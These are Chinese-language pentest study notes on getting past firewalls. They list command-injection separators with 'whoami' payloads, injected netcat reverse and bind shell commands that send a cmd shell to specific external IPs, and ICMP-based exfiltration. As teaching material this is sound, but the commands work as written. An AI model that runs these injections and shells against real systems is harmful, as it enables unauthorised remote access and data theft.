文件上传下载-解决无图形化&解决数据传输

防火墙绕过-正向连接&反向连接&内网服务器

Windows防火墙规则：

入站：规则严格，规则设置允许才能通过

• 出战：宽松，没有禁止就可以通过

管道符：| (管道符号) ||（逻辑或） &&（逻辑与）  &(后台任务符号)

Windows->| & || &&

Linux->; | || & && ``(特有``和;)

``可以包含命令并执行

例子：

ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 `whoami

1. 判断目标系统类型

2. windows没有自带的nc，想办法上传nc 反弹权限

3. 反弹

开启入站策略，采用反向连接

Linux：ncat -lvvp 5566

Windows：127.0.0.1 | nc -e cmd 47.94.236.117 5566

开启出站策略，采用正向连接

Linux：ncat -e cmd 47.122.23.131 5566

Windows：127.0.0.1 | nc -e cmd -lvvp 5566

正反向反弹案例-内网服务器

只能内网主动交出数据，反向连接

如果防火墙规则限制严格，入/出站都做了严格限制，只允许特定的服务医用通过，有漏洞数据不回显，可以把数据隐藏在ICMP协议中外带出去

绕过原理：ping命令走的ICMP协议，而防火墙禁用端口是控制TCP/UDP协议，也就是控制传输层，但是ICMP是网络层，是传输层下层，不受防火墙影响。所以可以使用ping命令将数据带出。